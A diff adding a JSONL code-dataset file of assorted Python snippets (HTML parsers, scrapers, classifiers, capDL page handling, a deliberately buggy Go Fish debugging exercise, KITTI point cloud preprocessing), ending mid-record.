diff --git "a/3971.jsonl" "b/3971.jsonl" new file mode 100644--- /dev/null +++ "b/3971.jsonl" @@ -0,0 +1,720 @@ +{"seq_id":"367709564","text":"from bs4 import BeautifulSoup\n\n\ndef html_to_text(html):\n text_info = get_text_info(html)\n words = get_words_unprocessed(html, text_info)\n texts = [text_info, words]\n return texts\n\n\ndef get_text_info(html):\n info = []\n soup = BeautifulSoup(html, \"lxml\")\n\n trials = len(soup.find_all('p'))\n info.append(trials)\n\n page = soup.find('style')\n temp = str(page.get_text().strip()).split('\\n')\n temp = temp[2:-1]\n for i in temp:\n x = i.strip()\n y = i.split(':')\n info.append(y[1].strip()[:-1])\n page = soup.find('x')\n temp = str(page.get_text().strip())\n info.append(temp)\n page = soup.find('y')\n temp = str(page.get_text().strip())\n info.append(temp)\n page = soup.find('sep')\n if page is not None:\n temp = str(page.get_text().strip())\n info.append(temp)\n return info\n\n\ndef get_words_unprocessed(html, text_info):\n temp = get_trial_texts(html)\n result = []\n x = 0\n for i in temp:\n trial = temp[x]\n x += 1\n if len(text_info) < 8:\n words = separate_words_eng(trial)\n else:\n words = separate_words_other(trial, text_info[7])\n result.append(words)\n\n return result\n\n\ndef get_trial_texts(text):\n soup = BeautifulSoup(text, \"lxml\")\n page = soup.find_all('p')\n trials = len(soup.find_all('p'))\n text = []\n for i in range(trials):\n text.append(page[i].get_text())\n\n return text\n\n\ndef separate_words_eng(text):\n result = []\n word_list = text.split('\\n')\n x = 0\n for line in word_list:\n temp = line.split()\n words = []\n for i in temp:\n words.append(\" \" + i)\n result.append(words)\n result[x].append(u'\\n')\n x += 1\n temp = sum(result, [])\n\n while temp[0] == \"\\n\" or temp[0] == \"\":\n temp = temp[1:]\n while temp[len(temp)-1] == \"\\n\" or temp[0] == \"\":\n temp = temp[:-1]\n return temp\n\n\ndef separate_words_other(text, sep):\n result = []\n word_list = text.split('\\n')\n x = 0\n for line in word_list:\n temp = line.split(sep)\n while \"\" in temp:\n temp.remove(\"\")\n result.append(temp)\n result[x].append(u'\\n')\n x += 1\n temp = sum(result, [])\n\n temp[:] = [item for item in temp if item != \"\\r\"]\n for i in range(len(temp)):\n if temp[i] == \"\\n\" and i > 1:\n tempWord = temp[i - 1][-1:len(temp[i - 1])]\n if tempWord == \"\\r\":\n temp[i - 1] = temp[i - 1][0:-2]\n\n while temp[0] == \"\\n\" or temp[0] == \"\":\n temp = temp[1:]\n while temp[len(temp)-1] == \"\\n\" or temp[len(temp)-1] == \"\":\n temp = temp[:-1]\n return temp\n\n\ndef get_num_trials(xml):\n root = xml.getroot()\n trials_id = []\n for i in range(0, len(root.getchildren())):\n nodes = root.getchildren()[i]\n trials_id.append(nodes.attrib['id'])\n\n return trials_id\n","sub_path":"EyeMap2/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"407423197","text":"\nlocalport = 9002\nIM_SIZE = (720,1280)\ndestport = 50001\ndestip = '127.0.0.1'\n\n\n\nimport connectors, time\nimport numpy as np\nimport cv2\n\ndata = ''\nmsg_size = IM_SIZE[0]*IM_SIZE[1]*3\n\nrx = connectors.RxConnector(localport)\ntx = connectors.TxConnector(destip, destport, 'TCP')\ni = 0\n\nwith rx, tx:\n while(True):\n while len(data) < msg_size:\n data += rx.recv(4096)\n rx.ack()\n data = ''\n tx.send('Hello there hunny #{}'.format(i))\n tx.ack()\n i += 1\n","sub_path":"demo/dummy.py","file_name":"dummy.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"402327957","text":"#Пример решения задачи на обработку веб-страниц\n#Собственно, красивый вывод в HTML\n#По строкам и столбцам - университеты, на пересечении - количество общих ссылок\n'''\nЗадача - насколько совпадают профили университетов через английскую википедию\nСписок всех университетов Москвы: https://en.wikipedia.org/wiki/Category:Universities_in_Moscow\nпопарно сравнить между собой и определить, кто с кем имеет больше общего\nАнализ:\nищем внутри
| ',' | '.join(allunivs_shorted),sep='\\t',end=' | |
| ',univ1[6:].replace('_',' '),' | ',file=fout)\n #print(univ1,end='\\t')\n for univ2 in allunivs:\n #print(len(linkunivs[univ1]&linkunivs[univ2]),end='\\t')\n print('',len(linkunivs[univ1] & linkunivs[univ2]), end=' | ',file=fout)\n #print()#для перевода строки\n print('
.+)', entry=CodeEntry)\n_error = EdgeData(r='^(?P\\S+): (?P.+)', entry=PyErrorEntry)\n_col = EdgeData(r='^ (?P\\s+)\\^', entry=ColEntry)\n\n\nclass Parser(SimpleParser):\n\n @lazy\n def graph(self):\n g = DiGraph()\n g.add_edge('start', 'file', data=_file)\n g.add_edge('file', 'code', data=_code)\n g.add_edge('code', 'file', data=_file)\n g.add_edge('code', 'error', data=_error)\n g.add_edge('code', 'col', data=_col)\n g.add_edge('col', 'error', data=_error)\n return g\n\n def event(self, entries: List[OutputEntry]):\n def folder(z: Tuple[List[OutputEntry], Maybe[FileEntry]], a):\n res, cur = z\n add, new = (\n (cur, Just(a))\n if isinstance(a, FileEntry) else\n ((cur / __.set(code=Just(a))).or_else(Just(a)), Empty())\n if isinstance(a, CodeEntry) else\n (Just(a), Empty())\n )\n return res + add.to_list, new\n grouped, rest = entries.fold_left((List(), Empty()))(folder)\n complete = grouped + rest.to_list\n return Just(MultiEvent(entries=complete))\n\n__all__ = ('Parser',)\n","sub_path":"myo/output/parser/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"392535875","text":"from urllib.parse import urljoin\r\n\r\nfrom .core import *\r\nfrom .vparsers import *\r\nfrom .utils import *\r\n\r\n\r\nclass ElizjumParkParser(SingleWebpageParser):\r\n url = \"http://www.kasbuddevelopment.pl/inwestycja/elizjum-park-\"\r\n method = \"POST\"\r\n params = {\r\n \"type\": \"0\",\r\n \"area_from\": \"-1\",\r\n \"area_to\": \"-1\",\r\n \"rooms_from\": \"-1\",\r\n \"rooms_to\": \"-1\",\r\n \"building_sel\": \"-1\",\r\n \"search\": \"1\"\r\n }\r\n \r\n schema = [\r\n DataUnit(label=\"Budynek\", parser=DOMTextExtractor(), id=\"building\"),\r\n DataUnit(label=\"Numer\", parser=DOMTextExtractor(), id=\"number\"),\r\n DataUnit(label=\"Pow.\", parser=AreaParser(DOMTextExtractor()), id=\"area\"),\r\n DataUnit(label=\"Pokoje\", parser=IntParser(DOMTextExtractor()), id=\"rooms\"),\r\n DataUnit(label=\"Ogródek\", parser=AreaParser(DOMTextExtractor()), id=\"garden\"),\r\n DataUnit(label=\"Status.\", parser=StatusParser(DOMTextExtractor()), id=\"status\"),\r\n DataUnit(label=\"Plan\", parser=LinkParser(DOMElementExtractor(\"a\")), id=\"plan\"),\r\n DataUnit(label=\"Cena\", parser=PriceParser(DOMTextExtractor()), id=\"price\")\r\n ]\r\n\r\n @attributeerror_wrapper(return_value=[])\r\n def find_records(self, soup):\r\n return soup.find(\"section\", {\"id\": \"apartment-list\"}).find(\"table\")\\\r\n .find(\"tbody\").find_all(\"tr\")\r\n \r\n def split_record(self, record):\r\n return record.find_all(\"td\")\r\n \r\n def modify_record(self, record, soup=None):\r\n record[\"fid\"] = self.create_fid(record)\r\n record[\"plan\"] = urljoin(self.url, record[\"plan\"])\r\n return record\r\n \r\n def create_fid(self, record):\r\n return \"{building}/{number}\".format(**record)\r\n","sub_path":"parsers/elizjumpark.py","file_name":"elizjumpark.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"447132114","text":"#\n# Copyright 2017, Data61\n# Commonwealth Scientific and Industrial Research Organisation (CSIRO)\n# ABN 41 687 119 230.\n#\n# This software may be distributed and modified according to the terms of\n# the BSD 2-Clause license. Note that NO WARRANTY is provided.\n# See \"LICENSE_BSD2.txt\" for details.\n#\n# @TAG(DATA61_BSD)\n#\n\n'''\nWrapper around a dict of pages for some extra functionality. Only intended to\nbe used internally.\n'''\n\nfrom __future__ import absolute_import, division, print_function, \\\n unicode_literals\n\nfrom .Cap import Cap\nfrom .Object import ASIDPool, Frame\nfrom .Spec import Spec\nfrom .util import round_down, PAGE_SIZE, lookup_architecture\nimport collections\n\ndef consume(iterator):\n '''Take a generator and exhaust it. Useful for discarding the unused result\n of something that would otherwise accumulate in memory. Clagged from\n https://docs.python.org/2/library/itertools.html'''\n # feed the entire iterator into a zero-length deque\n collections.deque(iterator, maxlen=0)\n\nclass PageCollection(object):\n def __init__(self, name='', arch='arm11', infer_asid=True, vspace_root=None):\n self.name = name\n self.arch = arch\n self._pages = {}\n self._vspace_root = vspace_root\n self._asid = None\n self.infer_asid = infer_asid\n self._spec = None\n\n def add_page(self, vaddr, read=False, write=False, execute=False, size=PAGE_SIZE):\n if vaddr not in self._pages:\n # Only create this page if we don't already have it.\n self._pages[vaddr] = {\n 'read':False,\n 'write':False,\n 'execute':False,\n 'size':PAGE_SIZE,\n }\n # Now upgrade this page's permissions to meet our current requirements.\n self._pages[vaddr]['read'] |= read\n self._pages[vaddr]['write'] |= write\n self._pages[vaddr]['execute'] |= execute\n self._pages[vaddr]['size'] = size\n\n def __getitem__(self, key):\n return self._pages[key]\n\n def __iter__(self):\n return self._pages.__iter__()\n\n def get_vspace_root(self):\n if not self._vspace_root:\n vspace = lookup_architecture(self.arch).vspace()\n self._vspace_root = vspace.get_make_object()('%s_%s' % (vspace.get_type_name(), self.name))\n return self._vspace_root, Cap(self._vspace_root)\n\n def get_asid(self):\n if not self._asid and self.infer_asid:\n self._asid = ASIDPool('asid_%s' % self.name)\n self._asid[0] = self.get_vspace_root()[1]\n return self._asid\n\n def get_spec(self):\n if self._spec is not None:\n return self._spec\n\n spec = Spec(self.arch)\n\n # Page directory and ASID.\n vspace_root, vspace_root_cap = self.get_vspace_root()\n spec.add_object(vspace_root)\n asid = self.get_asid()\n if asid is not None:\n spec.add_object(asid)\n\n # Construct frames and infer page objects from the pages.\n vspace = spec.arch.vspace()\n object_counter = 0\n objects = {}\n for page_counter, (page_vaddr, page) in enumerate(self._pages.items()):\n frame = Frame('frame_%s_%04d' % (self.name, page_counter),\n page['size'])\n spec.add_object(frame)\n page_cap = Cap(frame, read=page['read'], write=page['write'],\n grant=page['execute'])\n\n # Walk the hierarchy, creating missing objects until we can\n # insert the frame\n level = vspace\n parent = vspace_root\n while level.child is not None and page['size'] < level.child.coverage:\n level = level.child\n object_vaddr = level.base_vaddr(page_vaddr)\n object_index = level.parent_index(object_vaddr)\n if (level, object_vaddr) not in objects:\n object = level.make_object('%s_%s_%04d' % (level.type_name, self.name, object_counter))\n object_counter += 1\n spec.add_object(object)\n object_cap = Cap(object)\n parent[object_index] = object_cap\n objects[(level, object_vaddr)] = object\n parent = parent[object_index].referent\n object_counter += 1\n parent[level.child_index(page_vaddr)] = page_cap\n\n # Cache the result for next time.\n assert self._spec is None\n self._spec = spec\n\n return spec\n\ndef create_address_space(regions, name='', arch='arm11'):\n assert isinstance(regions, list)\n\n pages = PageCollection(name, arch)\n for r in regions:\n assert 'start' in r\n assert 'end' in r\n v = round_down(r['start'])\n while round_down(v) < r['end']:\n pages.add_page(v, r.get('read', False), r.get('write', False),\n r.get('execute', False))\n v += PAGE_SIZE\n\n return pages\n","sub_path":"python-capdl-tool/capdl/PageCollection.py","file_name":"PageCollection.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"248987323","text":"import pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.svm import SVC\n\nfrom sklearn.utils import shuffle\n\n\ndef run_classifiers(X_train, X_test, y_train, y_test, cls=''):\n names = [\"Nearest Neighbors\", \"RBF SVM\", \"Random Forest\", \"Neural Net\"]\n\n classifiers = [\n KNeighborsClassifier(weights='distance', n_jobs=-1),\n SVC(probability=True, class_weight='balanced'),\n RandomForestClassifier(n_estimators=100, n_jobs=-1, class_weight='balanced'),\n MLPClassifier(solver='lbfgs', hidden_layer_sizes=(64, 64, 64,), max_iter=10000)]\n\n X_train, y_train = shuffle(X_train, y_train)\n\n for name, clf in zip(names, classifiers):\n print('Starting evaluation of {} for class {}'.format(name, cls))\n clf.fit(X_train, y_train)\n # predict = clf.predict(X_test)\n # print('For class {} predicted {}'.format(cls, predict))\n score = clf.score(X_test, y_test)\n\n print('For class {} - Name: [{}], Score: [{}]'.format(cls, name, score))\n\n\ndef load_split_and_test(data_file):\n print('Loading data from {}'.format(data_file))\n data = pd.read_csv(data_file, header=None)\n\n X = data.iloc[:, :-1]\n y = data.iloc[:, -1]\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.1, random_state=42)\n\n for cls in set(y_test):\n x_cls_test = X_test[y_test == cls]\n y_cls_test = y_test[y_test == cls]\n run_classifiers(X_train, x_cls_test, y_train, y_cls_test, cls)\n\n\ndef load_and_test(train_data_file, X_test, y_test):\n data = pd.read_csv(train_data_file, header=None)\n\n X = data.iloc[:, :-1]\n y = data.iloc[:, -1]\n run_classifiers(X, X_test, y, y_test)\n\n\ndef load_train_and_test(train_data_file, test_data_file):\n test_data = pd.read_csv(test_data_file, header=None)\n\n X_test = test_data.iloc[:, :-1]\n y_test = test_data.iloc[:, -1]\n load_and_test(train_data_file, X_test, y_test)\n\n\ndef main():\n # train_data_file = '/UP/Teza/classoptimizer/pendigits/pendigits.tra'\n # test_data_file = '/UP/Teza/classoptimizer/pendigits/pendigits.tes'\n # load_train_and_test(train_data_file, test_data_file)\n # load_split_and_test('/UP/Teza/classoptimizer/iris/iris.data')\n\n # 0.6 - 0.7\n data_file = '/UP/Teza/classoptimizer/gym-hyperplanes/gym_hyperplanes/data/Games/Games.txt'\n # very poor\n # data_file = '/UP/Teza/classoptimizer/gym-hyperplanes/gym_hyperplanes/data/huge/huge.txt'\n # 0.6 - 0.7\n # data_file = '/UP/Teza/classoptimizer/gym-hyperplanes/gym_hyperplanes/data/demo/data.txt'\n # 1.0\n # data_file = '/UP/Teza/classoptimizer/gym-hyperplanes/gym_hyperplanes/data/iris/iris.data'\n # 0.97-0.99\n # data_file = '/UP/Teza/classoptimizer/gym-hyperplanes/gym_hyperplanes/data/pendigits/pendigits.tra'\n load_split_and_test(data_file)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"gym_hyperplanes/classifiers/classic_classification.py","file_name":"classic_classification.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"139168488","text":"from functools import partial\n\nfrom c2cgeoform.views.abstract_views import ListField\nfrom sqlalchemy.orm import subqueryload\n\nfrom c2cgeoportal_admin.views.treeitems import TreeItemViews\nfrom c2cgeoportal_commons.models.main import Interface, Layer\n\n_list_field = partial(ListField, Layer)\n\n\nclass LayerViews(TreeItemViews):\n\n _list_fields = TreeItemViews._list_fields + [\n _list_field(\"public\"),\n _list_field(\"geo_table\"),\n _list_field(\"exclude_properties\"),\n ]\n\n _extra_list_fields = [\n _list_field(\n \"interfaces\",\n renderer=lambda layer_wms: \", \".join(\n [i.name or \"\" for i in sorted(layer_wms.interfaces, key=lambda i: i.name)]\n ),\n sort_column=Interface.name,\n filter_column=Interface.name,\n ),\n _list_field(\n \"restrictionareas\",\n renderer=lambda layer_wms: \", \".join(\n [r.name or \"\" for r in sorted(layer_wms.restrictionareas, key=lambda r: r.name)]\n ),\n ),\n ] + TreeItemViews._extra_list_fields\n\n def _base_query(self, query):\n return super()._base_query(\n query.outerjoin(\"interfaces\")\n .options(subqueryload(\"interfaces\"))\n .options(subqueryload(\"restrictionareas\"))\n )\n","sub_path":"admin/c2cgeoportal_admin/views/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"296701908","text":"#REPETITIVAS \"ITERACION\" QUE INPRIME 5 VECES LA MISMA VARIABLE ESCRITA POR TECLADO\nimport os\nnombre=\"\"\n\n#ARGUMENTO\n#ASIGNACION DE VALORES\nnombre=os.sys.argv[1]\n\n#PROCESSING DE LA ESTRUCTURA \"ITERACION\"\nfor x in nombre:\n print(x*5)\n#fin_iterar\nprint(\"FIN DEL BUCLE\")\n","sub_path":"LIZA_DAMIAN_CARLOS/ITERACION/bucle_iteracion04.py","file_name":"bucle_iteracion04.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"536252811","text":"# This might not be finished debugging\n\n# GoFishBuggy -- a buggy Go Fish Game\n# reference: Adam Barr, Find the Bug\nimport random\ndef getCard(deck):\n\t\"\"\" Randomly remove a single card from the deck and return it. Assumes deck is not empty\n\t\"\"\"\n\tindex = int(len(deck)*random.random())\n\tnewCard= deck[index]\n\tdel deck[index]\n\treturn newCard\n\ndef drawCard(name,deck,hand):\n\t\"\"\" Draw a new card from the deck and add it to hand. If the hand now holds the rank in \n\tall four suits, remove them from the hand\n\t\"\"\"\n\tif len(deck) > 0: # non-empty deck\n\t\tnewCard = getCard(deck)\n\t\tcardRank = newCard[0]\n\t\tcardSuit=newCard[1]\n\n\t\tif cardRank in hand:\n\t\t\thand[cardRank].append(cardSuit)\n\t\t\tif len(hand) == 4:\n\t\t\t\tprint(name + \" lay down \" + cardRank + \"s\")\n\t\t\t\tdel hand[cardRank]\n\t\telse:\n\t\t\thand[cardRank] = [ cardSuit ]\n\ndef checkCard( handName, playerHand,cardRank, opponentHand):\n\t\"\"\"Check if opponentHand contains any cards of this specified rank.. If so, transfer\n\tto playerHand\n\n\tReturns 1 if a card transferred, 0 otherwise\n\t\"\"\"\n\tif cardRank in opponentHand:\n\t\ttransferCards = opponentHand[cardRank]\n\t\t#transferCards is a ist\n\t\tdel opponentHand[cardRank]\n\t\tif cardRank in playerHand:\n\t\t\tplayerHand[cardRank].extend(transferCards)\n\t\telse:\n\t\t\tplayerHand[cardRank] = transferCards\n\n\t\tif len(playerHand[cardRank])==4:\n\t\t\tprint(handName+\" lay down \", cardRank +\"s\")\n\t\t\tdel playerHand[cardRank]\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\ndef doTurn(handName, deck, playerHand, opponentHand):\n\t\"\"\" play one turn of Go Fish:\n\t- a rank in playerHand is chosen and \n\t- if any cards of that rank exist in opponentHand\n\t- they are transferred\n\t- This continues until no cards are transferred at which point\n\t- a card is drawn from the deck\n\t\"\"\"\n\n\twhile len(playerHand):\n\t\tindex = int(len(playerHand)* random.random())\n\t\trankToCheck = playerHand.keys()[index]\n\t\tfound=checkCard(handName,opponentHand, rankToCheck, playerHand)\n\t\tif found==0:\n\t\t\tbreak\n\t\n\tdrawCard(handName, deck, playerHand)\n\nranks = [\"2\",\"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"J\", \"Q\", \"K\", \"A\"]\nsuits = [ \"spades\", \"hearts\", \"diamonds\", \"clubs\"]\n\ndef playGoFish():\n\tprint(\"hello\")\n\tdeck=[]\n\thand1={}\n\thand2={}\n\tfor rank in ranks:\n\t\tfor suit in suits:\n\t\t\tdeck.append((rank,suit))\n\n\tfor i in range(7):\n\t\tdrawCard(\"HAND1\", deck, hand1)\n\t\tdrawCard(\"HAND2\", deck, hand2)\n\n\twhile 1:\n\t\tdoTurn(\"HAND1\",deck, hand1, hand2)\n\t\tdoTurn(\"HAND2\", deck, hand2, hand1)\n\t\tif len(hand1)==0 and len(hand2)==0:\n\t\t\tbreak\n\n\nplayGoFish()\n","sub_path":"debug4.py","file_name":"debug4.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"616823205","text":"# -*- coding:utf-8 -*-\nimport os\n\nBASE_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\ndef swagger():\n import subprocess\n code = subprocess.call([\n \"swagger_py_codegen\", \"-s\", \"docs/api.yaml\", \"-p\", \"propellant\", BASE_DIR\n ])\n\n return code\n","sub_path":"flak/commands/swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"193445298","text":"import re\n\ndef abbreviate(long):\n '''Converts a phrase to its acronym\n \n Keyword arguments\n long -- the phrase to convert\n\n returns a string\n\n '''\n x = 0\n y = 1\n acro = ''\n \n # determines the pattern to search for in long\n for l in long:\n if l.isupper():\n acro += l[0]\n elif ':' in long:\n pattern = '(^\\w+):\\s'\n x = 1 \n elif ',' in long:\n pattern = '(^\\w)\\w+\\s(\\w)\\w+,\\s(\\w)\\w+\\s(\\w)\\w+'\n x = 4 \n elif '-' in long:\n pattern = '(^\\w)\\w+\\s(\\w)\\w+-(\\w)\\w+\\s(\\w)'\n x = 4\n else:\n pattern = '(^\\w)\\w+\\s(\\w)\\w+\\s(\\w)'\n x = 3\n\n # searches long for selected pattern\n match = re.search(pattern, long)\n\n # returns HTML or loops through match to return correct acronym\n if acro != 'HTML':\n acro = '' \n while y <= x:\n acro += match.group(y)\n y += 1\n\n return acro.upper()\n","sub_path":"python/acronym/acronym.py","file_name":"acronym.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"255496699","text":"#!/usr/bin/python\n# -*- codding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import write_one_parameter\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/medialive/update-reservation.html\nif __name__ == '__main__':\n \"\"\"\n\tdelete-reservation : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/medialive/delete-reservation.html\n\tdescribe-reservation : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/medialive/describe-reservation.html\n\tlist-reservations : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/medialive/list-reservations.html\n \"\"\"\n\n parameter_display_string = \"\"\"\n # reservation-id : Unique reservation ID, e.g. â1234567â\n \"\"\"\n add_option_dict = {}\n\n #######################################################################\n # parameter display string\n add_option_dict[\"parameter_display_string\"] = parameter_display_string\n # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n write_one_parameter(\"medialive\", \"update-reservation\", \"reservation-id\", add_option_dict)\n\n\n\n\n\n","sub_path":"medialive_write_1/reservation_update.py","file_name":"reservation_update.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"145812535","text":"from distutils.version import LooseVersion\n\nimport pytest\nfrom numpy.testing import assert_almost_equal\n\nfrom pyproj import CRS, Proj, proj_version_str, transform\n\n\n@pytest.mark.parametrize(\"proj_class\", [Proj, CRS])\ndef test_datum(proj_class, aoi_data_directory):\n p1 = proj_class(proj=\"latlong\", datum=\"WGS84\")\n s_1 = -111.5\n s_2 = 45.25919444444\n p2 = proj_class(proj=\"utm\", zone=10, datum=\"NAD27\")\n x2, y2 = transform(p1, p2, s_1, s_2)\n if LooseVersion(proj_version_str) < LooseVersion(\"6.3.0\"):\n assert_almost_equal((x2, y2), (1402291.0833290431, 5076289.591846835))\n else:\n # https://github.com/OSGeo/PROJ/issues/1808\n assert_almost_equal((x2, y2), (1402285.9829252, 5076292.4212746))\n","sub_path":"test/test_datum.py","file_name":"test_datum.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"604842255","text":"import pathlib\nimport pickle\nimport time\nfrom collections import defaultdict\n\nimport numpy as np\nfrom skimage import io as imgio\n\nfrom second.core import box_np_ops\nfrom second.core import preprocess as prep\nfrom second.core.geometry import points_in_convex_polygon_3d_jit\nfrom second.core.point_cloud.bev_ops import points_to_bev\nfrom second.data import kitti_common as kitti\n\n\ndef merge_second_batch(batch_list, _unused=False):\n example_merged = defaultdict(list)\n for example in batch_list:\n for k, v in example.items():\n example_merged[k].append(v)\n ret = {}\n example_merged.pop(\"num_voxels\")\n for key, elems in example_merged.items():\n if key in [\n 'voxels', 'num_points', 'num_gt', 'gt_boxes', 'voxel_labels',\n 'match_indices'\n ]:\n ret[key] = np.concatenate(elems, axis=0)\n elif key == 'match_indices_num':\n ret[key] = np.concatenate(elems, axis=0)\n elif key == 'coordinates':\n coors = []\n for i, coor in enumerate(elems):\n coor_pad = np.pad(\n coor, ((0, 0), (1, 0)),\n mode='constant',\n constant_values=i)\n coors.append(coor_pad)\n ret[key] = np.concatenate(coors, axis=0)\n else:\n ret[key] = np.stack(elems, axis=0)\n return ret\n\n\ndef prep_pointcloud(input_dict,\n root_path,\n voxel_generator,\n target_assigner,\n db_sampler=None,\n max_voxels=20000,\n class_names=['Car'],\n remove_outside_points=False,\n training=True,\n create_targets=True,\n shuffle_points=False,\n reduce_valid_area=False,\n remove_unknown=False,\n gt_rotation_noise=[-np.pi / 3, np.pi / 3],\n gt_loc_noise_std=[1.0, 1.0, 1.0],\n global_rotation_noise=[-np.pi / 4, np.pi / 4],\n global_scaling_noise=[0.95, 1.05],\n global_loc_noise_std=(0.2, 0.2, 0.2),\n global_random_rot_range=[0.78, 2.35],\n generate_bev=False,\n without_reflectivity=False,\n num_point_features=4,\n anchor_area_threshold=1,\n gt_points_drop=0.0,\n gt_drop_max_keep=10,\n remove_points_after_sample=True,\n anchor_cache=None,\n remove_environment=False,\n random_crop=False,\n reference_detections=None,\n add_rgb_to_points=False,\n lidar_input=False,\n unlabeled_db_sampler=None,\n out_size_factor=2,\n min_gt_point_dict=None,\n bev_only=False,\n use_group_id=False,\n out_dtype=np.float32):\n \"\"\"convert point cloud to voxels, create targets if ground truths \n exists.\n \"\"\"\n points = input_dict[\"points\"]\n\n voxel_size = voxel_generator.voxel_size\n pc_range = voxel_generator.point_cloud_range\n grid_size = voxel_generator.grid_size\n # [352, 400]\n\n voxels, coordinates, num_points = voxel_generator.generate(\n points, max_voxels)\n\n example = {\n 'voxels': voxels,\n 'num_points': num_points,\n 'coordinates': coordinates,\n \"num_voxels\": np.array([voxels.shape[0]], dtype=np.int64)\n }\n # example.update({\n # 'rect': rect,\n # 'Trv2c': Trv2c,\n # 'P2': P2,\n # })\n # if not lidar_input:\n feature_map_size = grid_size[:2] // out_size_factor\n feature_map_size = [*feature_map_size, 1][::-1]\n if anchor_cache is not None:\n anchors = anchor_cache[\"anchors\"]\n anchors_bv = anchor_cache[\"anchors_bv\"]\n matched_thresholds = anchor_cache[\"matched_thresholds\"]\n unmatched_thresholds = anchor_cache[\"unmatched_thresholds\"]\n else:\n ret = target_assigner.generate_anchors(feature_map_size)\n anchors = ret[\"anchors\"]\n anchors = anchors.reshape([-1, 7])\n matched_thresholds = ret[\"matched_thresholds\"]\n unmatched_thresholds = ret[\"unmatched_thresholds\"]\n anchors_bv = box_np_ops.rbbox2d_to_near_bbox(\n anchors[:, [0, 1, 3, 4, 6]])\n example[\"anchors\"] = anchors\n # print(\"debug\", anchors.shape, matched_thresholds.shape)\n # anchors_bv = anchors_bv.reshape([-1, 4])\n anchors_mask = None\n if anchor_area_threshold >= 0:\n coors = coordinates\n dense_voxel_map = box_np_ops.sparse_sum_for_anchors_mask(\n coors, tuple(grid_size[::-1][1:]))\n dense_voxel_map = dense_voxel_map.cumsum(0)\n dense_voxel_map = dense_voxel_map.cumsum(1)\n anchors_area = box_np_ops.fused_get_anchors_area(\n dense_voxel_map, anchors_bv, voxel_size, pc_range, grid_size)\n anchors_mask = anchors_area > anchor_area_threshold\n # example['anchors_mask'] = anchors_mask.astype(np.uint8)\n example['anchors_mask'] = anchors_mask\n # if generate_bev:\n # bev_vxsize = voxel_size.copy()\n # bev_vxsize[:2] /= 2\n # bev_vxsize[2] *= 2\n # bev_map = points_to_bev(points, bev_vxsize, pc_range,\n # without_reflectivity)\n # example[\"bev_map\"] = bev_map\n # if not training:\n # return example\n # if create_targets:\n # targets_dict = target_assigner.assign(\n # anchors,\n # gt_boxes,\n # anchors_mask,\n # gt_classes=gt_classes,\n # matched_thresholds=matched_thresholds,\n # unmatched_thresholds=unmatched_thresholds)\n # example.update({\n # 'labels': targets_dict['labels'],\n # 'reg_targets': targets_dict['bbox_targets'],\n # 'reg_weights': targets_dict['bbox_outside_weights'],\n # })\n return example\n\n\ndef _read_and_prep_v9(info, root_path, num_point_features, prep_func):\n \"\"\"read data from KITTI-format infos, then call prep function.\n \"\"\"\n # velodyne_path = str(pathlib.Path(root_path) / info['velodyne_path'])\n # velodyne_path += '_reduced'\n v_path = pathlib.Path(root_path) / info['velodyne_path']\n v_path = v_path.parent.parent / (\n v_path.parent.stem + \"_reduced\") / v_path.name\n\n points = np.fromfile(\n str(v_path), dtype=np.float32,\n count=-1).reshape([-1, num_point_features])\n image_idx = info['image_idx']\n rect = info['calib/R0_rect'].astype(np.float32)\n Trv2c = info['calib/Tr_velo_to_cam'].astype(np.float32)\n P2 = info['calib/P2'].astype(np.float32)\n\n input_dict = {\n 'points': points,\n 'rect': rect,\n 'Trv2c': Trv2c,\n 'P2': P2,\n 'image_shape': np.array(info[\"img_shape\"], dtype=np.int32),\n 'image_idx': image_idx,\n 'image_path': info['img_path'],\n # 'pointcloud_num_features': num_point_features,\n }\n\n if 